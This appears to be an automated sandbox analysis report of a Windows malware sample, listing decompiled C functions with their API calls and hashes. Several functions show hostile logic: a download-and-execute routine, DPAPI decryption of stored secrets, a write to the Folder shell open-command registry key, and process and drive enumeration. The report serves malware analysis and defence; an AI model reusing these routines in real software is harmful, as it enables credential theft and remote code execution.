
                                      C-Code - Quality: 68%
                                      			E0025582B(void* __ecx) {
                                      				_Unknown_base(*)()* _t2;
                                      				void* _t4;
                                      
                                      				_t4 = __ecx;
                                      				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
                                      				if(_t4 == 0) {
                                      					if(_t2 != 0) {
                                      						_t2 =  *_t2(0, "An assertion condition failed", "Assert", 0x2010);
                                      					}
                                      					ExitProcess(1);
                                      				}
                                      				return _t2;
                                      			}

                                      Instruction addresses (one per decompiled statement, in order): 0x00255831, 0x0025583f, 0x00255848, 0x0025584c, 0x0025585f, 0x0025585f, 0x00255863, 0x00255863, 0x00255869

                                      APIs
                                      • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00255833
                                      • GetProcAddress.KERNEL32(00000000,MessageBoxA,?,00000000,?,?,?,?,?,?,?,002555EF,?,00000000,.bss,00000000), ref: 0025583F
                                      • ExitProcess.KERNEL32 ref: 00255863
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressExitLibraryLoadProcProcess
                                      • String ID: An assertion condition failed$Assert$MessageBoxA$USER32.DLL
                                      • API String ID: 881411216-1361702557
                                      • Opcode ID: 2fcac5fa7fd8d4d1a94a4e208d90b13caf48498e1e2d3c533f9d8648c972c944
                                      • Instruction ID: 99cc2f45e5baeb5a6f8f0d4cf74eda2e2ddaab90960cb2ca85f224f4dbfd2f34
                                      • Opcode Fuzzy Hash: 2fcac5fa7fd8d4d1a94a4e208d90b13caf48498e1e2d3c533f9d8648c972c944
                                      • Instruction Fuzzy Hash: 61D017607E5B22EAEE102BA02D5EB6526A89B23F43F048460BA08970C3C5E148EC8175
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      C-Code - Quality: 100%
                                      			E0025F6C1() {
                                      				void* _v8;
                                      				int _v12;
                                      				int _v16;
                                      				struct _SECURITY_DESCRIPTOR* _v20;
                                      				struct _SECURITY_ATTRIBUTES _v24;
                                      				struct _SECURITY_DESCRIPTOR _v44;
                                      				long _t20;
                                      
                                      				if(InitializeSecurityDescriptor( &_v44, 1) == 0 || SetSecurityDescriptorDacl( &_v44, 1, 0, 0) == 0) {
                                      					L5:
                                      					return 0;
                                      				} else {
                                      					_v24 = 0xc;
                                      					_v20 =  &_v44;
                                      					_v16 = 0;
                                      					_t20 = RegCreateKeyExA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", 0, 0, 0, 0x20006,  &_v24,  &_v8,  &_v12);
                                      					if(_t20 != 0) {
                                      						SetLastError(_t20);
                                      						goto L5;
                                      					}
                                      					RegCloseKey(_v8);
                                      					return 1;
                                      				}
                                      			}

                                      Instruction addresses (one per decompiled statement, in order; 0x00000000 marks a jump target with no own instruction): 0x0025f6d6, 0x0025f738, 0x00000000, 0x0025f6ec, 0x0025f6ef, 0x0025f6f6, 0x0025f700, 0x0025f71a, 0x0025f722, 0x0025f732, 0x00000000, 0x0025f732, 0x0025f727, 0x00000000, 0x0025f72d

                                      APIs
                                      • InitializeSecurityDescriptor.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,?,?,0025F901), ref: 0025F6CE
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,0025F901), ref: 0025F6E2
                                      • RegCreateKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00000000,00000000,00020006,0000000C,0025F901,?), ref: 0025F71A
                                      • RegCloseKey.ADVAPI32(0025F901), ref: 0025F727
                                      • SetLastError.KERNEL32(00000000), ref: 0025F732
                                      Strings
                                      • Software\Classes\Folder\shell\open\command, xrefs: 0025F710
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DescriptorSecurity$CloseCreateDaclErrorInitializeLast
                                      • String ID: Software\Classes\Folder\shell\open\command
                                      • API String ID: 1473660444-2536721355
                                      • Opcode ID: 284ddba4f0383a5a8a9498fb6871da4a2bc3fd4fd6a91693892a5fa271ed133b
                                      • Instruction ID: fb3ede02b7d7fa28212cf6e903206a503abc030386240c371f8c69c8b3b6424e
                                      • Opcode Fuzzy Hash: 284ddba4f0383a5a8a9498fb6871da4a2bc3fd4fd6a91693892a5fa271ed133b
                                      • Instruction Fuzzy Hash: 74011A71951229FADB209FA19D8DEDFBFBCEF19751F004022F905E2180D6B08659CAA0
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: __floor_pentium4
                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                      • API String ID: 4168288129-2761157908
                                      • Opcode ID: c111c2fdef7f73d5c6a03afdedb7824bc75b80ab703edd8288aeb216db9df023
                                      • Instruction ID: b3c1a47407b180ba27e55f485fac8b73b1f23b1c6ef17a67916c45cae2acb83c
                                      • Opcode Fuzzy Hash: c111c2fdef7f73d5c6a03afdedb7824bc75b80ab703edd8288aeb216db9df023
                                      • Instruction Fuzzy Hash: FFC27A71E242298FDB25CE68CC487EAB7F9EB48314F5441EAD90DE7240E775AE918F40
                                      Uniqueness

                                      Uniqueness Score: 0.12%

                                      C-Code - Quality: 100%
                                      			E0025FE7E(void* __ecx, void* __eflags) {
                                      				char _v264;
                                      				intOrPtr _v292;
                                      				void* _v300;
                                      				int _t11;
                                      				void* _t22;
                                      
                                      				_t22 = CreateToolhelp32Snapshot(2, 0);
                                      				E00251052( &_v300, 0, 0x128);
                                      				_v300 = 0x128;
                                      				_t11 = Process32First(_t22,  &_v300);
                                      				while(_t11 != 0) {
                                      					if(E002510E6( &_v264, "explorer.exe") == 0) {
                                      						return _v292;
                                      					}
                                      					_t11 = Process32Next(_t22,  &_v300);
                                      				}
                                      				CloseHandle(_t22);
                                      				return 0;
                                      			}

                                      Instruction addresses (one per decompiled statement, in order; 0x00000000 marks a jump target with no own instruction): 0x0025fe98, 0x0025fea4, 0x0025feac, 0x0025feba, 0x0025fee7, 0x0025fed7, 0x00000000, 0x0025fef8, 0x0025fee1, 0x0025fee1, 0x0025feec, 0x00000000

                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0025FE8D
                                      • Process32First.KERNEL32(00000000,?), ref: 0025FEBA
                                      • Process32Next.KERNEL32(00000000,?), ref: 0025FEE1
                                      • CloseHandle.KERNEL32(00000000), ref: 0025FEEC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID: explorer.exe
                                      • API String ID: 420147892-3187896405
                                      • Opcode ID: d09e3b9a5e4a1d9d28f951b76bac268afc75d580f85b4f7881bffba1c33f0c28
                                      • Instruction ID: 6ee70c4945ab4dad699d8dcf4b6acce5b5dfcec79b628a3e0935e14068c7d8ac
                                      • Opcode Fuzzy Hash: d09e3b9a5e4a1d9d28f951b76bac268afc75d580f85b4f7881bffba1c33f0c28
                                      • Instruction Fuzzy Hash: C501D672615114ABD7609B60AC4AFDA73BCDB46311F1000A1FD05E2181EB74DEA88A58
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E0025EC17(signed int* __ecx, void* __edx) {
                                      				char _v524;
                                      				intOrPtr _v552;
                                      				void* _v560;
                                      				struct tagPROCESSENTRY32W* _t8;
                                      				void* _t14;
                                      				void* _t18;
                                      				signed int* _t19;
                                      
                                      				_t14 = __edx;
                                      				_v560 = 0x22c;
                                      				_t19 = __ecx;
                                      				_t18 = CreateToolhelp32Snapshot(2, 0);
                                      				if(_t18 == 0xffffffff) {
                                      					L6:
                                      					 *_t19 =  *_t19 & 0x00000000;
                                      				} else {
                                      					_t8 =  &_v560;
                                      					Process32FirstW(_t18, _t8);
                                      					while(_t8 != 0) {
                                      						if(_v552 == _t14) {
                                      							CloseHandle(_t18);
                                      							E00253412(_t19,  &_v524);
                                      						} else {
                                      							_t8 = Process32NextW(_t18,  &_v560);
                                      							continue;
                                      						}
                                      						goto L7;
                                      					}
                                      					CloseHandle(_t18);
                                      					goto L6;
                                      				}
                                      				L7:
                                      				return _t19;
                                      			}

                                      Instruction addresses (one per decompiled statement, in order; 0x00000000 marks a jump target with no own instruction): 0x0025ec27, 0x0025ec29, 0x0025ec33, 0x0025ec3b, 0x0025ec40, 0x0025ec73, 0x0025ec73, 0x0025ec42, 0x0025ec42, 0x0025ec4a, 0x0025ec68, 0x0025ec58, 0x0025ec7e, 0x0025ec8d, 0x0025ec5a, 0x0025ec62, 0x00000000, 0x0025ec62, 0x00000000, 0x0025ec58, 0x0025ec6d, 0x00000000, 0x0025ec6d, 0x0025ec77, 0x0025ec7c

                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0025EC35
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0025EC4A
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0025EC62
                                      • CloseHandle.KERNEL32(00000000), ref: 0025EC6D
                                      • CloseHandle.KERNEL32(00000000), ref: 0025EC7E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 1789362936-0
                                      • Opcode ID: 37da82ac6788abc8e97a08dc683066b41f631482eb009508c054ed109b5dedf7
                                      • Instruction ID: 61b672222cc2958e83294f0e8a4f8cc7db7203144c8ce9cbff7456b251703c41
                                      • Opcode Fuzzy Hash: 37da82ac6788abc8e97a08dc683066b41f631482eb009508c054ed109b5dedf7
                                      • Instruction Fuzzy Hash: 0101D671200215ABDB345FA4BC4DB7F76BCEB45727F2040AAE905D2190D7B08E498B54
                                      Uniqueness

                                      Uniqueness Score: 0.68%

                                      C-Code - Quality: 24%
                                      			E002592D8(intOrPtr __ecx, WCHAR* __edx, void* __eflags, intOrPtr _a4) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				char _v16;
                                      				intOrPtr _v20;
                                      				char _v24;
                                      				char _v8216;
                                      				char* _t24;
                                      				signed int _t27;
                                      				WCHAR* _t29;
                                      				intOrPtr _t30;
                                      				signed int* _t31;
                                      				intOrPtr _t32;
                                      				void* _t34;
                                      				intOrPtr _t35;
                                      				intOrPtr _t36;
                                      				void* _t38;
                                      				void* _t39;
                                      
                                      				_t30 = __ecx;
                                      				E00251130(0x2014, __ecx);
                                      				_t36 = _a4;
                                      				_t29 = __edx;
                                      				_v8 = _t30;
                                      				_t3 = _t36 - 1; // -1
                                      				_t34 = GlobalAlloc(0x40, _t3);
                                      				_t38 = 1;
                                      				if(_t36 > 1) {
                                      					_t32 = _v8;
                                      					do {
                                      						 *((char*)(_t34 + _t38 - 1)) =  *((intOrPtr*)(_t38 + _t32));
                                      						_t38 = _t38 + 1;
                                      					} while (_t38 < _t36);
                                      				}
                                      				_t8 = _t36 - 1; // -1
                                      				_v12 = _t34;
                                      				_v16 = _t8;
                                      				_t39 = 0;
                                      				_t24 =  &_v16;
                                      				__imp__CryptUnprotectData(_t24, 0, 0, 0, 0, 0,  &_v24);
                                      				if(_t24 == 0) {
                                      					_push(L"Could not decrypt");
                                      				} else {
                                      					if(_t36 > 0) {
                                      						_t35 = _v20;
                                      						_t31 =  &_v8216;
                                      						do {
                                      							_t27 =  *(_t35 + _t39) & 0x000000ff;
                                      							_t39 = _t39 + 2;
                                      							 *_t31 = _t27;
                                      							_t31 =  &(_t31[0]);
                                      						} while (_t39 < _t36);
                                      					}
                                      					_push( &_v8216);
                                      				}
                                      				return lstrcpyW(_t29, ??);
                                      			}

                                      Instruction addresses: 0x002592d8, 0x002592e0, 0x002592e8, 0x002592eb, 0x002592ed, 0x002592f0, 0x002592fe, 0x00259300, 0x00259303, 0x00259305, 0x00259308, 0x0025930b, 0x0025930f, 0x00259310, 0x00259308, 0x00259314, 0x00259317, 0x0025931a, 0x0025931d, 0x00259328, 0x0025932c, 0x00259334, 0x0025935d, 0x00259336, 0x00259338, 0x0025933a, 0x0025933d, 0x00259343, 0x00259343, 0x00259347, 0x0025934a, 0x0025934d, 0x00259350, 0x00259343, 0x0025935a, 0x0025935a, 0x0025936d

                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,-00000001,75F645FD,?,?,?,0025928C,00001000,?,00000000,00001000), ref: 002592F6
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0025928C), ref: 0025932C
                                      • lstrcpyW.KERNEL32(?,Could not decrypt), ref: 00259363
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocCryptDataGlobalUnprotectlstrcpy
                                      • String ID: Could not decrypt
                                      • API String ID: 3112367126-1484008118
                                      • Opcode ID: bc5fef7ad4fd6a7e9b3465423f609c5cc2d81ec8aa4d96492785f4dc08b5d291
                                      • Instruction ID: 1f9b51e9b405b9a28d9930f13b5c854bd558b0c97e6e5405c8beefc2a666c443
                                      • Opcode Fuzzy Hash: bc5fef7ad4fd6a7e9b3465423f609c5cc2d81ec8aa4d96492785f4dc08b5d291
                                      • Instruction Fuzzy Hash: 0211297291061AEBCB11CF98C8849EEF7BCEF49701B1080A5DD55E3251E2319E59CBB0
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      C-Code - Quality: 100%
                                      			E0025D508(void* __ecx, void* __eflags) {
                                      				void* _v8;
                                      				short _v12;
                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                      				long _v20;
                                      				long _v24;
                                      				union _SID_NAME_USE _v28;
                                      				short _v60;
                                      				short _v580;
                                      				void* _t37;
                                      
                                      				_v20 = 0x10;
                                      				_v8 = 0;
                                      				_t37 = __ecx;
                                      				_v16.Value = 0;
                                      				_v12 = 0x500;
                                      				E00251052( &_v580, 0, 0x208);
                                      				_v24 = 0x104;
                                      				if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v8) == 0 || LookupAccountSidW(0, _v8,  &_v580,  &_v24,  &_v60,  &_v20,  &_v28) == 0) {
                                      					GetLastError();
                                      				}
                                      				if(_v8 != 0) {
                                      					FreeSid(_v8);
                                      				}
                                      				E00253412(_t37,  &_v580);
                                      				return _t37;
                                      			}

                                      Instruction addresses: 0x0025d515, 0x0025d527, 0x0025d52c, 0x0025d52e, 0x0025d531, 0x0025d537, 0x0025d53f, 0x0025d565, 0x0025d58c, 0x0025d58c, 0x0025d595, 0x0025d59a, 0x0025d59a, 0x0025d5a9, 0x0025d5b3

                                      APIs
                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0025B7F2,?,?,00000001), ref: 0025D55D
                                      • LookupAccountSidW.ADVAPI32(00000000,0025B7F2,?,00000104,?,00000010,?), ref: 0025D582
                                      • GetLastError.KERNEL32(?,?,00000001), ref: 0025D58C
                                      • FreeSid.ADVAPI32(0025B7F2,?,?,00000001), ref: 0025D59A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AccountAllocateErrorFreeInitializeLastLookup
                                      • String ID:
                                      • API String ID: 1866703397-0
                                      • Opcode ID: be6781ff517a0fc897bd14bd40a47fec617a7c7b4ea302be0c97477e5d16883c
                                      • Instruction ID: 1f8dd84cba889c88d8a9f70277904d59d4d198999908639e12fcc3179048a7b7
                                      • Opcode Fuzzy Hash: be6781ff517a0fc897bd14bd40a47fec617a7c7b4ea302be0c97477e5d16883c
                                      • Instruction Fuzzy Hash: 8B11DAB190021DEBDB10DFD4DD89EEEB7BCFB08745F504066E605E2190E7709B589BA4
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 92%
                                      			E00252675(void* __ecx, void* __eflags, signed int _a4) {
                                      				short* _v12;
                                      				void* _v16;
                                      				char _v20;
                                      				void* _t26;
                                      				void* _t36;
                                      				void* _t38;
                                      				void* _t42;
                                      				void* _t58;
                                      				void* _t59;
                                      
                                      				_t66 = __eflags;
                                      				_t42 = __ecx;
                                      				_t58 = 0x1a;
                                      				E0025D75B( &_v12, _t58, __eflags);
                                      				_t59 = 0xa;
                                      				_t26 = E002532D4( &_v16, _t59, __eflags);
                                      				E00253162(E00253297( &_v12, _t59, _t66, "\\"), _t66, _t26);
                                      				E00255A2D(_v16);
                                      				_t61 = _a4 + 4;
                                      				E0025345A( &_v16, _a4 + 4);
                                      				E00253162( &_v12, _t66, E0025334A( &_v16,  &_a4));
                                      				E00255A2D(_a4);
                                      				_a4 = _a4 & 0x00000000;
                                      				E00255A2D(_v16);
                                      				_t36 = E0025345A( &_a4, _t61);
                                      				__imp__URLDownloadToFileW(0, _a4, _v12, 0, 0);
                                      				E00255A2D(_a4);
                                      				if(_t36 == 0) {
                                      					_t38 = ShellExecuteW(0, L"open", _v12, 0, 0, 5);
                                      					_v16 = 2;
                                      					__eflags = _t38 - 0x20;
                                      					if(_t38 > 0x20) {
                                      						_v16 = 0;
                                      					}
                                      				} else {
                                      					_v16 = 1;
                                      				}
                                      				_v20 = 0x262784;
                                      				E00254B53(_t42,  &_v20);
                                      				return E00255A2D(_v12);
                                      			}

                                      Instruction addresses: 0x00252675, 0x0025267e, 0x00252685, 0x00252686, 0x0025268d, 0x00252691, 0x002526a8, 0x002526b0, 0x002526bb, 0x002526bf, 0x002526d4, 0x002526dc, 0x002526e4, 0x002526e8, 0x002526f4, 0x00252702, 0x0025270d, 0x00252714, 0x0025272c, 0x00252732, 0x00252739, 0x0025273c, 0x0025273e, 0x0025273e, 0x00252716, 0x00252716, 0x00252716, 0x00252744, 0x0025274e, 0x0025275f

                                      APIs
                                        • Part of subcall function 0025D75B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0025D78C
                                        • Part of subcall function 00253162: lstrcatW.KERNEL32(00000000,?), ref: 00253192
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                        • Part of subcall function 0025345A: lstrcpyW.KERNEL32(00000000,?), ref: 00253484
                                        • Part of subcall function 0025334A: PathFindExtensionW.SHLWAPI(?), ref: 00253354
                                      • URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00252702
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 0025272C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Path$DownloadExecuteExtensionFileFindFolderFreeShellSpecialVirtuallstrcatlstrcpy
                                      • String ID: open
                                      • API String ID: 4166385161-2758837156
                                      • Opcode ID: 24f1ffb9f78c6d7ec9ffc4e93bc00436ee604fa1ae48593ce115ef6e057bd559
                                      • Instruction ID: 988bc6288d43cc7d099b1326c10fdd01bbec564ca15bdde61adb79e34492c1a4
                                      • Opcode Fuzzy Hash: 24f1ffb9f78c6d7ec9ffc4e93bc00436ee604fa1ae48593ce115ef6e057bd559
                                      • Instruction Fuzzy Hash: 4121B432D10108B7CB14EFA0C896DEEBB78AF85742F108058FC1667191DB709A5DCF94
                                      Uniqueness

                                      Uniqueness Score: 37.75%

                                      C-Code - Quality: 85%
                                      			E0025DFC9(intOrPtr __ecx, void* __eflags) {
                                      				void* _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				int _v20;
                                      				WCHAR* _v24;
                                      				intOrPtr _v28;
                                      				signed int _v32;
                                      				intOrPtr _v36;
                                      				char _v40;
                                      				WCHAR* _t33;
                                      				intOrPtr _t34;
                                      				int _t44;
                                      				WCHAR* _t54;
                                      				signed int _t72;
                                      				intOrPtr _t74;
                                      				int _t75;
                                      				long _t76;
                                      				WCHAR* _t77;
                                      				void* _t78;
                                      				void* _t79;
                                      
                                      				_t74 = __ecx;
                                      				_v12 = __ecx;
                                      				_t33 = E00255ADB(0x208);
                                      				_v32 = _v32 & 0x00000000;
                                      				_t54 = _t33;
                                      				_t34 = 5;
                                      				_v28 = _t34;
                                      				_v36 = _t34;
                                      				E00251996( &_v40, __eflags);
                                      				_t76 = GetLogicalDriveStringsW(0x104, _t54);
                                      				_t81 = _t76 - 0x104;
                                      				if(_t76 > 0x104) {
                                      					_t72 = 2;
                                      					_t54 = E00255ADB( ~(0 | _t81 > 0x00000000) | _t36 * _t72);
                                      					GetLogicalDriveStringsW(_t76, _t54);
                                      				}
                                      				_t77 = 0;
                                      				if( *_t54 != 0) {
                                      					do {
                                      						_v24 = _t77;
                                      						E00253264( &_v24, E00253412( &_v8, _t54));
                                      						E00255A2D(_v8);
                                      						_v8 = _t77;
                                      						_t44 = GetDriveTypeW(_v24);
                                      						_t79 = _t79 - 0xc;
                                      						_t75 = _t44;
                                      						_t78 = _t79;
                                      						_v20 = _t75;
                                      						E0025345A(_t78,  &_v24);
                                      						 *(_t78 + 4) = _t75;
                                      						 *((intOrPtr*)(_t78 + 8)) = _v16;
                                      						E002518A3( &_v40);
                                      						_t54 =  &(( &(_t54[E0025308E( &_v24)]))[1]);
                                      						E00255A2D(_v24);
                                      						_t77 = 0;
                                      						_v24 = 0;
                                      						_t84 =  *_t54;
                                      					} while ( *_t54 != 0);
                                      					_t74 = _v12;
                                      				}
                                      				E00251348(_t74, _t84,  &_v40);
                                      				_t60 = _v40;
                                      				if(_v40 != 0) {
                                      					E00251AA0(_t60, _t60);
                                      				}
                                      				return _t74;
                                      			}

                                      Instruction addresses: 0x0025dfd2, 0x0025dfd9, 0x0025dfdc, 0x0025dfe1, 0x0025dfea, 0x0025dfec, 0x0025dfed, 0x0025dff0, 0x0025dff3, 0x0025e004, 0x0025e006, 0x0025e00c, 0x0025e012, 0x0025e021, 0x0025e025, 0x0025e025, 0x0025e02b, 0x0025e030, 0x0025e032, 0x0025e036, 0x0025e042, 0x0025e04a, 0x0025e052, 0x0025e055, 0x0025e05b, 0x0025e05e, 0x0025e060, 0x0025e062, 0x0025e06b, 0x0025e076, 0x0025e079, 0x0025e07c, 0x0025e08f, 0x0025e092, 0x0025e097, 0x0025e099, 0x0025e09c, 0x0025e09c, 0x0025e0a1, 0x0025e0a1, 0x0025e0aa, 0x0025e0af, 0x0025e0b4, 0x0025e0b7, 0x0025e0b7, 0x0025e0c2

                                      APIs
                                        • Part of subcall function 00255ADB: GetProcessHeap.KERNEL32(00000000,000000F4,0025E415,?,?,00000000,002555C4,?,?,00000000), ref: 00255ADE
                                        • Part of subcall function 00255ADB: HeapAlloc.KERNEL32(00000000,?,00000000,002555C4,?,?,00000000), ref: 00255AE5
                                      • GetLogicalDriveStringsW.KERNEL32(00000104,00000000), ref: 0025DFFE
                                      • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 0025E025
                                      • GetDriveTypeW.KERNEL32(?,00000000,00000000), ref: 0025E055
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Drive$HeapLogicalStrings$AllocProcessType
                                      • String ID:
                                      • API String ID: 2408535517-0
                                      • Opcode ID: 0ff79fd8a09b05773bcd6417ea6ede6b1101fda48e7cd2d157321211b5d54e04
                                      • Instruction ID: 1e097e311d9ca6e73c201c74d903aebd16d443f38ff42caefd4e11ac8605e251
                                      • Opcode Fuzzy Hash: 0ff79fd8a09b05773bcd6417ea6ede6b1101fda48e7cd2d157321211b5d54e04
                                      • Instruction Fuzzy Hash: D4318271E102199BCF15EFA4C5969EEB7F8EF48342F104069E902B7281DB705E19CFA5
                                      Uniqueness

                                      Uniqueness Score: 37.75%

                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 012E6090
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 012E609A
                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 012E60A7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
